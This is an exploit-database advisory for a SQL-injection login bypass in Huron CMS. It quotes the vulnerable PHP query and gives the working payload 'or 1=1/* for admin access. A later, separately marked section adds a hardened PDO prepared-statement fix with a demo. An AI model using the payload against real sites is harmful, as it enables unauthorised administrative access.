Huron CMS 8 11 2007 - Authentication Bypass

Author: mat
type: webapps
platform: php
date_added: 2010-03-29  
verified: 1  
codes: OSVDB-63363  
application_url: http://www.exploit-db.comHuron_28_11_2007.zip  

raw file: 11963.txt  
        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability
Script: http://huroncms.googlecode.com/files/Huron_28_11_2007.zip
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

//------------------------------------------------------------------+
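<?
	// Login check from the application: $_POST['usr'] and $_POST['pas'] are
	// concatenated into the SQL string without escaping or parameter binding.
	$consulta = "select user from Administrador where user='".$_POST['usr']."' AND password='".$_POST['pas']."'";
	$resultado=mysql_query($consulta,$link);
	// Count the returned rows; any row at all is treated as a successful login.
	$i=0;
	while($row = mysql_fetch_array($resultado))
	{
		$i++;
	}
	if($i>0){
?>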
//------------------------------------------------------------------+

http://[target]/[path]/index.php

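Enter the following as both username and password: 'or 1=1/*
The quote closes the string, or 1=1 makes the WHERE clause true for every row, and /* comments out the rest of the query, so the row count is greater than zero.
You will be logged in as admin.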

Greetings: All Hackerz
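
A hardened form of the login check quoted above, as an added example that is not part of the original advisory or of the Huron CMS code base: the query uses a PDO prepared statement and the password is checked with password_verify(). The in-memory SQLite database, the demo password and the helper names make_demo_db() and check_login() are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the application's database: same table and column
// names as the query in the advisory, but the password column holds a
// password_hash() value instead of a plaintext password.
function make_demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE Administrador (user TEXT PRIMARY KEY, password TEXT NOT NULL)');
    $ins = $pdo->prepare('INSERT INTO Administrador (user, password) VALUES (?, ?)');
    $ins->execute(['admin', password_hash('constructed-demo-password', PASSWORD_DEFAULT)]);
    return $pdo;
}

// Hypothetical helper: true only when the user exists and the password matches.
function check_login(PDO $pdo, $usr, $pas): bool {
    // Reject arrays (usr[]=...) and any other non-string POST value.
    if (!is_string($usr) || !is_string($pas)) {
        return false;
    }
    // The placeholder keeps the input as data; it never becomes SQL text.
    $stmt = $pdo->prepare('SELECT password FROM Administrador WHERE user = :usr');
    $stmt->execute([':usr' => $usr]);
    $hash = $stmt->fetchColumn();
    // fetchColumn() returns false when no row matched the user name.
    return is_string($hash) && password_verify($pas, $hash);
}

$pdo = make_demo_db();
$payload = "'or 1=1/*"; // the string given in the advisory

// The advisory's input is compared literally against the user column.
var_dump(check_login($pdo, $payload, $payload));
// Correct credentials for the constructed account.
var_dump(check_login($pdo, 'admin', 'constructed-demo-password'));
// Correct user name, wrong password.
var_dump(check_login($pdo, 'admin', 'wrong'));
```

In the application itself the two arguments would be $_POST['usr'] and $_POST['pas'], and the PDO handle would point at the MySQL database in place of the deprecated mysql_query() link.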